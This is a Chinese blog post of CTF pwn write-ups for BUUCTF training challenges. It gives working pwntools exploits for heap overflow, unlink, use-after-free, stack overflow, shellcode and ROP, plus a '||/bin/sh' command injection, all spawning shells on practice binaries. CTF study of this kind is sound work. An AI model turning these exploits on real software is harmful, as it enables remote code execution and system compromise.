buuctf-pwn write-ups (5)

最新推荐文章于 2024-04-11 16:24:58 发布
最新推荐文章于 2024-04-11 16:24:58 发布
阅读量221 收藏
点赞数 1
分类专栏: write_ups 文章标签: pwn 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54218833/article/details/125251517
版权

buu039-[ZJCTF 2019]EasyHeap

一道堆题,经典的菜单,创建chunk(最多10个),编辑chunk(可以有任意长度的堆溢出),删除chunk(没有悬挂指针)。因此本题考察堆溢出。

由于本题环境在2.23,因此可以使用的堆漏洞方式比更高版本的更多。

      if ( choice == 4869 )
      {
        if ( (unsigned __int64)magic <= 0x1305 )
        {
          puts("So sad !");
        }
        else
        {
          puts("Congrt !");
          l33t();
        }
      }

题目里面有这么一段,应该是只要能够把地址magic的位置修改成大于0x1305,然后选项填4869就能getshell。

方法1:fastbin attack
这应该是最简单的方法了。分配一些小的chunk,然后通过堆溢出直接修改chunk的fd指针。这个时候需要绕过一个检查:

if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
            {
              errstr = "malloc(): memory corruption (fast)";
            errout:
              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
              return NULL;
            }

也就是会检查fastbin的chunk的size是否正确。我们可以错位分配fastbin chunk到bss段中的heaparray中,以实现对写入地址的完全控制。


分配之后,heaparray[2]应该是0x6020B5-0x8的地址。修改magic之后调用l33t函数,但是发现没有这个文件。好家伙玩我是吧…

但是还有其他方法。我们现在控制了bss段,可以随意修改heaparray,从而实现任一地址任意长度写。因此可以修改got表,把exit或malloc等函数改成system的plt地址即可,但是由于要传入参数,所以考虑修改free.got。

exp:

from pwn import *
context(arch='amd64', log_level='debug')

# io = process('./easyheap')
elf = ELF('./easyheap')
io = remote('node4.buuoj.cn', 28974)

def create(size, content):
	io.sendlineafter(b'Your choice :', b'1')
	io.sendlineafter(b'Size of Heap : ', str(size).encode())
	io.sendlineafter(b'Content of heap:', content)

def edit(index, size, content):
	io.sendlineafter(b'Your choice :', b'2')
	io.sendlineafter(b'Index :', str(index).encode())
	io.sendlineafter(b'Size of Heap : ', str(size).encode())
	io.sendlineafter(b'Content of heap :', content)

def delete(index):
	io.sendlineafter(b'Your choice :', b'3')
	io.sendlineafter(b'Index :', str(index).encode())

create(0x40, b'colin')		# chunk #0
create(0x60, b'colin')		# chunk #1
delete(1)
edit(0, 0x100, cyclic(0x40) + p64(0) + p64(0x71) + p64(0x6020B5 - 8))	# overflow chunk #1
create(0x60, b'colin')	# new chunk #1
create(0x60, b'\x00' * 3 + p64(0) * 4 + p64(elf.got['free']))	# alloc chunk in bss, overflow chunk #0
edit(0, 0x8, p64(elf.plt['system']))		# edit free().got to system().plt
create(0x60, b'/bin/sh')
delete(3)	# system('/bin/sh')
io.interactive()

方法2:unlink
通过使用unsorted bin的unlink操作控制heaparray数组,也是一种可行的方法。具体的实现原理请参考我的how2heap系列第5、8篇文章,本题的实现原理与how2heap中unlink的演示高度相似。

exp:

from pwn import *
context(arch='amd64', log_level='debug')

# io = process('./easyheap')
elf = ELF('./easyheap')
io = remote('node4.buuoj.cn', 28974)

def create(size, content):
	io.sendlineafter(b'Your choice :', b'1')
	io.sendlineafter(b'Size of Heap : ', str(size).encode())
	io.sendlineafter(b'Content of heap:', content)

def edit(index, size, content):
	io.sendlineafter(b'Your choice :', b'2')
	io.sendlineafter(b'Index :', str(index).encode())
	io.sendlineafter(b'Size of Heap : ', str(size).encode())
	io.sendlineafter(b'Content of heap :', content)

def delete(index):
	io.sendlineafter(b'Your choice :', b'3')
	io.sendlineafter(b'Index :', str(index).encode())
	
create(0x80, b'colin')	# chunk #0
create(0x80, b'colin')	# chunk #1
create(0x80, b'/bin/sh')	# chunk #2
fakechunk_struct = p64(0)
fakechunk_struct += p64(0x80)	# fake chunk size = 0x80
fakechunk_struct += p64(0x6020E0 - 0x18)	# fake chunk fd, fd->bk = fake chunk
fakechunk_struct += p64(0x6020E0 - 0x10)	# fake chunk bk, bk->fd = fake chunk
fakechunk_struct += cyclic(0x80 - 0x20)
fakechunk_struct += p64(0x80)	# overwrite chunk #1 prev size
fakechunk_struct += p64(0x90)	# overwrite prev_in_use bit = 0
edit(0, 0x90, fakechunk_struct)
delete(1)	# trigger unlink, after deletion chunk #0 should be 0x6020E0 - 0x18 = 0x6020C8
edit(0, 0x20, cyclic(0x18) + p64(elf.got['free']))	# change chunk #0 to free().got
edit(0, 0x8, p64(elf.plt['system']))	# change free().got to system().plt
delete(2)	# system('/bin/sh')
io.interactive()

方法3:爆破修改__malloc_hook
在方法一的fastbin attack之后,我们通过释放一个chunk到unsorted bin中能够在堆中写入main_arena+88的地址。通过分析可知__malloc_hook的地址应为main_arena - 0x10处。如果需要在这里分配一个fastbin,需要写入main_arena - 0x23来错位分配(起始地址即为下图中标出的地方),但这样需要修改最低两个字节的值,因此倒数第二低字节的高4位需要爆破,成功率为1/16。分配到这里的地址之后,把one_gadget写入到hook中调用malloc即可。


但是这种方法在本题中不太可行。因为本题不能读取任何数据,只能通过修改unsorted bin的fd和bk指针分配,而unsorted bin的检查比fastbin多得多,无法通过检查。如果能够将fastbin chunk的fd中写入此处的地址应该是没有问题的,但问题就在于我们无法获取其地址,只能通过修改低字节的方式修改它。

后来想想,如果真的要将fastbin chunk中的fd指针修改为main arena的地址也不是不行。方法:首先通过前两种方法获取到对heaparray的写权限,然后把一个chunk释放两次,第一次释放在fastbin中,第二次释放在unsorted bin中,两次释放之间通过堆溢出修改chunk的大小(改大)使第二次能被释放到unsorted bin中。

不过按照上面的方法就显得有点多此一举了。其思想与方法一是相同的,都是错位分配。因此这里就不再进行赘述了。感兴趣的读者可以自己实现一下。

buu040-wustctf2020_getshell

from pwn import *
# io = process('./pwn')
io = remote('node4.buuoj.cn', 29015)
io.sendline(cyclic(24) + p32(0xdeadbeef) + p32(0x804851B))
io.interactive()

buu041-bjdctf_2020_router

nc直接连,输入1然后输入||/bin/sh即可。这是linux命令行特性,要知道||的含义:上一条命令执行失败之后执行下一条命令,远程没有ping,因此直接执行/bin/sh。

buu042-hitcontraining_uaf

经典菜单题,从题目标题就能看出来是一道考UAF的题。在del_note函数中果然出现了UAF漏洞:

if ( notelist[index] )
  {
    free(notelist[index]->strbuf);
    free(notelist[index]);		// 没有清空指针
    puts("Success");
  }

通过分析add_note函数可知,最多分配5个chunk,每一个chunk有一个函数指针和一个存放字符串的buffer,函数指针固定指向print_note_content函数。不难想到通过UAF可以将函数指针修改为后门函数magic:

  • 首先分配两个chunk,字符串chunk的大小大于0x20
  • 释放这两个chunk
  • 分配第三个chunk,字符串chunk大小为0x20,这样第三个chunk的字符串chunk和第一个chunk位置相同,修改其函数指针调用即可。
from pwn import *
context.log_level='debug'

# io = process('./pwn')
io = remote('node4.buuoj.cn', 25067)

def add(size, content):
	io.sendlineafter(b'Your choice :', b'1')
	io.sendlineafter(b'Note size :', str(size).encode())
	io.sendlineafter(b'Content :', content)

def delete(index):
	io.sendlineafter(b'Your choice :', b'2')
	io.sendlineafter(b'Index :', str(index).encode())

def printc(index):
	io.sendlineafter(b'Your choice :', b'3')
	io.sendlineafter(b'Index :', str(index).encode())

add(0x18, b'colin')
add(0x18, b'colin')
delete(0)
delete(1)
add(0x8, p32(0x8048945) + p32(0))
printc(0)
io.interactive()

buu043-picoctf_2018_buffer overflow 1

from pwn import *
# io = process('./pwn')
io = remote('node4.buuoj.cn', 25573)
io.sendline(cyclic(40+4) + p32(0x80485CB))
io.interactive()

buu044-jarvisoj_test_your_memory

from pwn import *
context.log_level='debug'
# io = process('./pwn')
io = remote('node4.buuoj.cn', 27588)
io.sendline(cyclic(19+4) + p32(0x8048440) + p32(0x80487E0)*2)
io.interactive()

buu045-mrctf2020_shellcode

from pwn import *
context(arch='amd64', log_level='debug')
# io = process('./pwn')
io = remote('node4.buuoj.cn', 26987)
io.sendline(asm(shellcraft.amd64.sh()))
io.interactive()

buu046-inndy_rop

首先把’/bin/sh’写到bss段然后系统调用。

from pwn import *
context.log_level='debug'
io = process('./pwn')
# io = remote('node4.buuoj.cn', 25928)
int80 = 0x806C943
popeax_ret = 0x80B8016
popebx_edx_ret = 0x806ECD9
popecx_ret = 0x80DE769
addesp0x14_ret = 0x807A75D
bss = 0x80EBFD4
read = 0x806D290
payload = cyclic(12 + 4)

payload += p32(read)			# call read()
payload += p32(addesp0x14_ret)	# return address, add esp to execute latter ROP
payload += p32(0)				# arg #1 of read(): stdin
payload += p32(bss)				# arg #2 of read(): a bss address
payload += p32(0x8)				# arg #3 of read(): read length
payload += p32(0) * 2

payload += p32(popeax_ret)		# eax = 0x11(SYS_EXECVE)
payload += p32(11)
payload += p32(popebx_edx_ret)
payload += p32(bss)				# ebx = '/bin/sh'
payload += p32(0)				# edx = 0
payload += p32(popecx_ret)
payload += p32(0)				# ecx = 0
payload += p32(int80)			# int 80
io.sendline(payload)
io.sendline(b'/bin/sh' + b'\x00')
io.interactive()
C0Lin
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 493
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
pwnable.kr-uaf WP
Casuall的博客
06-22 500
UAF(Use After Free)释放后重用,其实是一种指针未置空造成的漏洞。 首先介绍一下迷途指针的概念 在计算机编程领域中,迷途指针,或称悬空指针、野指针,指的是不指向任何合法的对象的指针。 当所指向的对象被释放或者收回,但是对该指针没有作任何的修改,以至于该指针仍旧指向已经回收的内存地址,此情况下该指针便称迷途指针。若操作系统将这部分已经释放的内存重新分配给另外一个进程,而原来的程序重...
Buuctf[第五空间决赛2024]pwn5
最新发布
2401_83974345的博客
04-11 793
发现为32位2.ida32反编译从 /dev/urandom 中读取了四个字节的随机数,将其存储数据到unk_804c044所指向的内存,然后要求用户输入name和passwd。用户输入name后,它会直接将输入内容输出到屏幕上,然后要求用户输入passwd。程序将尝试将用户输入的passwd转换为整数,如果与之前生成的随机数相等,则输出"ok!!“并调用 /bin/sh执行 shell;否则输出"fail”发现存在格式化字符串漏洞3.“访问”构造Python脚本偏移量为10)
BUUCTF--第五空间决赛pwn5
sandyyyz的博客
10-13 406
给和我一样的pwn新手参考的一次简单的格式化字符串漏洞题解析过程
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 395
buuctf-pwn 001-016题wp
BUUCTF-PWN-[第五空间2019 决赛]PWN5
m0_64180167的博客
04-17 461
这题考到 格式化字符串的方法 我之前没有学过 根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护 nx打开 所以无法写入shellcode现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计 发现输入名字 他会返回名字 然后再输入密码 如果密码和unk_804c044一样 输出shellcode我们看看这个函数是什么搜索一下发现是随机数 这样我们就无法通过判断得到shellcode我们现在又两个方法。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 369
Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp
Unlink
kelxLZ的博客
07-03 1572
Author:ZERO-A-ONE Date:2021-07-03 一、unlink的原理 简介:俗称脱链,就是将链表头处的free堆块unsorted bin中脱离出来然后和物理地址相邻的新free的堆块合并成大堆块(向前合并或者向后合并),再放入到unsorted bin中 危害原理:通过伪造free状态的fake_chunk,伪造fd指针和bk指针,通过绕过unlink的检测实现unlink,unlink就会往p所在的位置写入p-0x18,从而实现任意地址写的漏洞 漏洞产生原因:off.
BUUCTF [第五空间2019 决赛]PWN5
小白垃圾笔记2
04-27 625
先去atoi的plt表,然后plt表对应的got地址被我们改成system的plt表的地址了。system是第一次被执行,他首先去system的plt表,这个时候对应的got表里存放的是system的下一跳地址,他会去寻找system的地址,并且执行system。而plt表的下一跳就是got表,由于版本原因,并没有将atoi got表的地址改为system的got表,但是也是可以执行system的,因为我直接将他改为system在ida中的地址了。发现是把got表对那个的内容给改掉了。
[第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量
Dem1的博客
04-09 796
正经wp from pwn import* p=remote("node4.buuoj.cn",29506) bssaddr = 0x804c044 #binaddr = 0x0804932F #1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x' ## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78
BUUCTF-Pwn-[第五空间2019 决赛]PWN5
餐桌上的猫
02-15 352
题目截图 检查文件信息 这是一个32位的程序,开启了NX和Canary 用IDA打开查看找到来能getshell的代码 反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell 测试我们输入的内容在栈中的位置,是第10个 exp from pwn import* r=remote('node4.buuoj.cn',28850) addr=
hitcon2014_stkof(unsorted bin unlink)
seaaseesa的博客
04-09 813
hitcon2014_stkof 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit功能存在溢出。 程序没有show功能。 由于没有开启PIE,got表也可以修改,因此,我们利用unlink控制堆指针为got表,然后修改strlen的got表为puts的plt表,即可实现show的功能,进而泄露glibc地址,后续利用。 #coding:utf8 from ...
BUUCTF 第五空间2019 pwn5(格式化字符串)
菜的只能随便写写博客
02-02 1018
0x01 文件分析 32位elf 无PIE   0x02 运行  运行文件之后,出现两处输入,一个name和一个passwd,并且name的输入有回显,则有可能是栈漏洞和格式化字符串。   0x03 IDA查看 IDA F5反汇编之后的代码: int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 ...
pwn工具箱之unsorted bin attack
jmp esp
07-03 2774
unsorted bin attack基本信息利用类型:堆利用 堆利用类型:针对unsorted bin的利用,也就是需要用normal chunk或者large chunk释放得到的 利用思想:unsorted bin是一个双链表,在分配时会将unsorted bin中的chunk从unsorted bin中移除,是一个链表的unlink操作。如果能够控制unsorted bin chunk的
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值